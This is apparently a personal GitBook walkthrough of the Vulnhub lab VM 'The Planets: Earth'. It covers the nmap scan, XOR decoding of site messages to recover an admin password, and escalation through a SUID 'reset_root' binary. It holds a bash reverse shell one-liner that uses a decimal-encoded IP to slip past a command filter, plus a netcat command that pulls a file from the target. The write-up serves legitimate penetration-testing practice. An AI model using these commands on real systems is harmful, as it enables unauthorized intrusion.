🖋️
Cybersecurity Long haul
  • Road to PNPT
  • Book List
  • VirtualBox and OPNsense Setup
    • Installing OPNsense
      • VLAN Setup
        • Configuring OPNsense
          • Interface Configuration
          • Firewall Rules
            • DNS Resolver
              • Import Vulnerable Machine
  • Virtual Hacking Labs
  • VBSetup
  • OSCP Machine List:
  • Vulnhub Walkthroughs
    • Kioptrix 1
    • The Planets
      • Mercury
      • Venus
      • Earth
    • DC Series
      • DC-1
      • DC-2
      • DC-3
      • DC-4
  • HackMyVM
    • Easy
      • Gift
      • Pwned
      • Connection
      • BaseME
      • Hommie
Powered by GitBook
On this page

Was this helpful?

  1. Vulnhub Walkthroughs
  2. The Planets

Earth

Earth is an easy box though you will likely find it more challenging than "Mercury" in this series and on the harder side of easy, depending on your experience.

PreviousVenusNextDC Series

Last updated 2 years ago

Was this helpful?

nmap -A -vv 10.6.6.12 Starting Nmap 7.93 ( ) at 2022-11-15 10:38 PST NSE: Loaded 155 scripts for scanning. NSE: Script Pre-scanning. NSE: Starting runlevel 1 (of 3) scan. Initiating NSE at 10:38 Completed NSE at 10:38, 0.00s elapsed NSE: Starting runlevel 2 (of 3) scan. Initiating NSE at 10:38 Completed NSE at 10:38, 0.00s elapsed NSE: Starting runlevel 3 (of 3) scan. Initiating NSE at 10:38 Completed NSE at 10:38, 0.00s elapsed Initiating Ping Scan at 10:38 Scanning 10.6.6.12 [2 ports] Completed Ping Scan at 10:38, 0.00s elapsed (1 total hosts) Initiating Parallel DNS resolution of 1 host. at 10:38 Completed Parallel DNS resolution of 1 host. at 10:38, 0.00s elapsed Initiating Connect Scan at 10:38 Scanning earth.cyber.range (10.6.6.12) [1000 ports] Discovered open port 80/tcp on 10.6.6.12 Discovered open port 443/tcp on 10.6.6.12 Discovered open port 22/tcp on 10.6.6.12 Connect Scan Timing: About 42.40% done; ETC: 10:39 (0:00:42 remaining) Completed Connect Scan at 10:39, 70.02s elapsed (1000 total ports) Initiating Service scan at 10:39 Scanning 3 services on earth.cyber.range (10.6.6.12) Completed Service scan at 10:39, 12.04s elapsed (3 services on 1 host) NSE: Script scanning 10.6.6.12. NSE: Starting runlevel 1 (of 3) scan. Initiating NSE at 10:39 Completed NSE at 10:39, 0.71s elapsed NSE: Starting runlevel 2 (of 3) scan. Initiating NSE at 10:39 Completed NSE at 10:39, 1.18s elapsed NSE: Starting runlevel 3 (of 3) scan. Initiating NSE at 10:39 Completed NSE at 10:39, 0.00s elapsed Nmap scan report for earth.cyber.range (10.6.6.12) Host is up, received syn-ack (0.71s latency). Scanned at 2022-11-15 10:38:31 PST for 84s Not shown: 923 filtered tcp ports (no-response), 74 filtered tcp ports (host-unreach) PORT STATE SERVICE REASON VERSION 22/tcp open ssh syn-ack OpenSSH 8.6 (protocol 2.0) | ssh-hostkey: | 256 5b2c3fdc8b76e9217bd05624dfbee9a8 (ECDSA) | ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBKPfhMLiVGrmuwlz9rx/UAEXrre+sPMkyOxfOLyH0ghmVuDOqg/PCx3Mu5Gw1K/mwFxPc662JKeGcwcaQ0j13qs= | 256 b03c723b722126ce3a84e841ecc8f841 (ED25519) |_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIOFcnJNVluex1Y3TV86t7w42tFj8JupDpcN9OhZ878U2 80/tcp open http syn-ack Apache httpd 2.4.51 ((Fedora) OpenSSL/1.1.1l mod_wsgi/4.7.1 Python/3.9) |_http-server-header: Apache/2.4.51 (Fedora) OpenSSL/1.1.1l mod_wsgi/4.7.1 Python/3.9 |_http-title: Bad Request (400) 443/tcp open ssl/http syn-ack Apache httpd 2.4.51 ((Fedora) OpenSSL/1.1.1l mod_wsgi/4.7.1 Python/3.9) | tls-alpn: |_ http/1.1 | ssl-cert: Subject: commonName=earth.local/stateOrProvinceName=Space/localityName=Milky Way | Subject Alternative Name: DNS:earth.local, DNS:terratest.earth.local | Issuer: commonName=earth.local/stateOrProvinceName=Space/localityName=Milky Way | Public Key type: rsa | Public Key bits: 4096 | Signature Algorithm: sha256WithRSAEncryption | Not valid before: 2021-10-12T23:26:31 | Not valid after: 2031-10-10T23:26:31 | MD5: 4efa65d21a9e07184b5441da3712f187 | SHA-1: 04db5b29a33f8076f16b8a1b581d6988db257651 | -----BEGIN CERTIFICATE----- | MIIFhjCCA26gAwIBAgIUZZZYScVhllOGdJWBnhMx5ztnlkcwDQYJKoZIhvcNAQEL | BQAwOjEOMAwGA1UECAwFU3BhY2UxEjAQBgNVBAcMCU1pbGt5IFdheTEUMBIGA1UE | AwwLZWFydGgubG9jYWwwHhcNMjExMDEyMjMyNjMxWhcNMzExMDEwMjMyNjMxWjA6 | MQ4wDAYDVQQIDAVTcGFjZTESMBAGA1UEBwwJTWlsa3kgV2F5MRQwEgYDVQQDDAtl | YXJ0aC5sb2NhbDCCAiIwDQYJKoZIhvcNAQEBBQADggIPADCCAgoCggIBAMqFZz4K | O71xGgMvMuvefKWV4oZtq4qz6Y+Jq6nQ03zyZEsNSuGsKlBmZM54+hUGyNOOUScd | PL4kUBX0uMujUxq1XKceeg5gJ/kMEAKbe8bqzyN/tPNJ4aCM00fryP/+zDR9fSFZ | lGF3Xd+pmvLZz+D4CLVJDe5sEVoXIdtlg338gDVrCfkFUzl1uDTB4kPmLPu60LUP | 4FNUWb2FY2HgQcHIIn6HuQ7GhHVnuNbfPn0PCX5ugGC9XxQq8XzwZs51bprdTU8x | KaPkQKIJ60sGIS1xzgiLH5s2hkX5LW5u9V2mwqQ4CNS4FFMAbZl66NqPU08OuFau | HLp/NDdixZPequLZGjIS/JjfYkNKHElzoMgLk5qvqFt9YpPX4ktfGteX8TsfF+pP | ZdcudBC6BbODNTc+Wr+wLKe9OLZo1/EfJqHUH0h0Jwcrdfr/zOc77GzYhsdkSdiY | GXZy48BkVV/kmWsMDK6W5Cs2rJx5DmC7ugt14KkzYv6Vv/o5uUtJjRypBjQ/htmR | oo5mcKGaiohwCfR7T/lL1lA0Tq+cDYwATadudMQ8dgRmf099HO2iFXG4nqE+nacC | ezfDR8qTXZDUaoTWUFAxI6Bp4M3BCae6x9S+LM6KF6ZoNZ4VroYDD/iub16Ci1FP | biz6gaBX9iA/tBH6ubcW2V39EHgIswhwR0RtAgMBAAGjgYMwgYAwHQYDVR0OBBYE | FCX2FKvs/3HZedJN9wbc5w/o884/MB8GA1UdIwQYMBaAFCX2FKvs/3HZedJN9wbc | 5w/o884/MA8GA1UdEwEB/wQFMAMBAf8wLQYDVR0RBCYwJIILZWFydGgubG9jYWyC | FXRlcnJhdGVzdC5lYXJ0aC5sb2NhbDANBgkqhkiG9w0BAQsFAAOCAgEAmOynGBnK | GaLm68D50Xd0mKJlyjpHrI1I97btr7iNKa0UOfSBOutDPyN51j2ibyG/Eq9lVyS3 | DUEzG3PezGOP0EI8mmT92CqkPfc3+R6NL0q/+tszxgGPPmy66T8L/o+nHgUCrDbO | Ypa8DPhha7HFIVhlJC49PJI9/M8r6UqrJEWW1lJSSd3uSxyfrbt5YkxBAsaJQ9w5 | RgnAYYr4v/a+icwzNov9YdW2mqGl0NuKh6henh+T+4ctAz3aLsUL2rJni17/Tp1q | 6cxFkoNbbN6vTG7GjC0Mtqukbn9JIIfvWXQf7xWVIJIkvedhMDoikYE0tTeM8Vkz | GngVRaziwCRdG4ur8ZztqHXMemhQ+TVqxOobTgc1NDIoMjhF1xwfbh2lSi/5px3/ | iN3D80mJ32x19p8/A+b9dk1kMWTfT46FBrl3UeF4VgzLVsVL2QQWNDZmzo0d4k7B | Fn8Uzyzj7Tr1/R0oEL2Z75z2mZV9uClek7OLSarXFVQQOVgyXRbhG3+Q1AtVndur | IdII4FThlEP3jnSAEin1dnKgsuGjz+8olmsyqu9p0xkv3iVvM1ErD/TnNUhAZGou | ScfxACsYU2ZX8XKF/QyS35pgkR6/zJGashm/M9MMV8NN1AkhoQ0CwFzCcrQsGZjd | S6cvQe6K0mUe4pdZwTYd2T0de4jpofXbWms= |_-----END CERTIFICATE----- |_ssl-date: TLS randomness does not represent time |_http-server-header: Apache/2.4.51 (Fedora) OpenSSL/1.1.1l mod_wsgi/4.7.1 Python/3.9 |_http-title: Bad Request (400) NSE: Script Post-scanning. NSE: Starting runlevel 1 (of 3) scan. Initiating NSE at 10:39 Completed NSE at 10:39, 0.00s elapsed NSE: Starting runlevel 2 (of 3) scan. Initiating NSE at 10:39 Completed NSE at 10:39, 0.00s elapsed NSE: Starting runlevel 3 (of 3) scan. Initiating NSE at 10:39 Completed NSE at 10:39, 0.00s elapsed Read data files from: /usr/bin/../share/nmap Service detection performed. Please report any incorrect results at . Nmap done: 1 IP address (1 host up) scanned in 84.39 seconds Ports 22,80 and 443 open.

Lets try and visit the webpage.

Bad request. Hmm. Looking closer at the nmap scan I found Subject Alternative Name: DNS:earth.local, DNS:terratest.earth.local So I added 10.6.6.12 earth.local terratest.earth.local to /etc/hosts.

And at the bottom of the page:

Previous Messages:• 37090b59030f11060b0a1b4e0000000000004312170a1b0b0e4107174f1a0b044e0a000202134e0a161d17040359061d43370f15030b10414e340e1c0a0f0b0b061d430e0059220f11124059261ae281ba124e14001c06411a110e00435542495f5e430a0715000306150b0b1c4e4b5242495f5e430c07150a1d4a410216010943e281b54e1c0101160606591b0143121a0b0a1a00094e1f1d010e412d180307050e1c17060f43150159210b144137161d054d41270d4f0710410010010b431507140a1d43001d5903010d064e18010a4307010c1d4e1708031c1c4e02124e1d0a0b13410f0a4f2b02131a11e281b61d43261c18010a43220f1716010d40 • 3714171e0b0a550a1859101d064b160a191a4b0908140d0e0d441c0d4b1611074318160814114b0a1d06170e1444010b0a0d441c104b150106104b1d011b100e59101d0205591314170e0b4a552a1f59071a16071d44130f041810550a05590555010a0d0c011609590d13430a171d170c0f0044160c1e150055011e100811430a59061417030d1117430910035506051611120b45 • 2402111b1a0705070a41000a431a000a0e0a0f04104601164d050f070c0f15540d1018000000000c0c06410f0901420e105c0d074d04181a01041c170d4f4c2c0c13000d430e0e1c0a0006410b420d074d55404645031b18040a03074d181104111b410f000a4c41335d1c1d040f4e070d04521201111f1d4d031d090f010e00471c07001647481a0b412b1217151a531b4304001e151b171a4441020e030741054418100c130b1745081c541c0b0949020211040d1b410f090142030153091b4d150153040714110b174c2c0c13000d441b410f13080d12145c0d0708410f1d014101011a050d0a084d540906090507090242150b141c1d08411e010a0d1b120d110d1d040e1a450c0e410f090407130b5601164d00001749411e151c061e454d0011170c0a080d470a1006055a010600124053360e1f1148040906010e130c00090d4e02130b05015a0b104d0800170c0213000d104c1d050000450f01070b47080318445c090308410f010c12171a48021f49080006091a48001d47514c50445601190108011d451817151a104c080a0e5a

Found that there is a robots.txt

Lets see what testingnotes.txt shows.

Alright we've got the encryption which might be useful for the sent messeges. We also have a username for an admin page. Lets checkout testdata.txt

According to radiometric dating estimation and other evidence, Earth formed over 4.5 billion years ago. Within the first billion years of Earth's history, life appeared in the oceans and began to affect Earth's atmosphere and surface, leading to the proliferation of anaerobic and, later, aerobic organisms. Some geological evidence indicates that life may have arisen as early as 4.1 billion years ago.

So I was able to decode this message with cyberchef and XOR. Putting the message from testdata.txt in the input field and found that the last message sent on earth.local is the decryption key. And we get a password. earthclimatechangebad4humans. So lets try that in the admin page.

Looks interesting. Maybe we can get a reverse shell with this.

Well we can't get a reverse shell.

I looked around some and stumbled on /var/earth_web/user_flag.txt

Did some research I was able to get a shell by converting my ip address to decimal. Wow who would've thought? bash -i >& /dev/tcp/167772162/5554 0>&1

So lets check what has SUID bit set. find / -perm -u=s -type f 2>/dev/null /usr/bin/chage /usr/bin/gpasswd /usr/bin/newgrp /usr/bin/su /usr/bin/mount /usr/bin/umount /usr/bin/pkexec /usr/bin/passwd /usr/bin/chfn /usr/bin/chsh /usr/bin/at /usr/bin/sudo /usr/bin/reset_root /usr/sbin/grub2-set-bootflag /usr/sbin/pam_timestamp_check /usr/sbin/unix_chkpwd /usr/sbin/mount.nfs /usr/lib/polkit-1/polkit-agent-helper-1

reset_root looks interesting. Lets look into that.

sh-5.1$ ./usr/bin/reset_root ./usr/bin/reset_root CHECKING IF RESET TRIGGERS PRESENT... RESET FAILED, ALL TRIGGERS ARE NOT PRESENT.

I wonder what the triggers are? We are gonna have to pull the reset_root file as the machine doesn't have ltrace. Let's set up a netcat listner on the attack machine.

nc -nvlp 5555 > rest

And the Earth machine:

nc -w 3 Yourip 5555 < /usr/bin/reset_root

Once you get the file chmod +x reset_root and run it with ltrace. ltrace ./rest puts("CHECKING IF RESET TRIGGERS PRESE"...CHECKING IF RESET TRIGGERS PRESENT... ) = 38 access("/dev/shm/kHgTFI5G", 0) = -1 access("/dev/shm/Zw7bV9U5", 0) = -1 access("/tmp/kcM0Wewe", 0) = -1 puts("RESET FAILED, ALL TRIGGERS ARE N"...RESET FAILED, ALL TRIGGERS ARE NOT PRESENT. ) = 44 +++ exited (status 0) +++

Easy enough. This is just looking for a few folders. So lets go ahead and make those.

sh-5.1$ touch /dev/shm/kHgTFI5G touch /dev/shm/kHgTFI5G sh-5.1$ touch /dev/shm/Zw7bV9U5 touch /dev/shm/Zw7bV9U5 sh-5.1$ touch /tmp/kcM0Wewe touch /tmp/kcM0Wewe sh-5.1$ ./usr/bin/reset_root

sh-5.1$ ./usr/bin/reset_root ./usr/bin/reset_root CHECKING IF RESET TRIGGERS PRESENT... RESET TRIGGERS ARE PRESENT, RESETTING ROOT PASSWORD TO: Earth

And there you have it. All machines in this series were really fun!

What shall I do next?

https://nmap.org
https://nmap.org/submit/
LogoThe Planets: Earth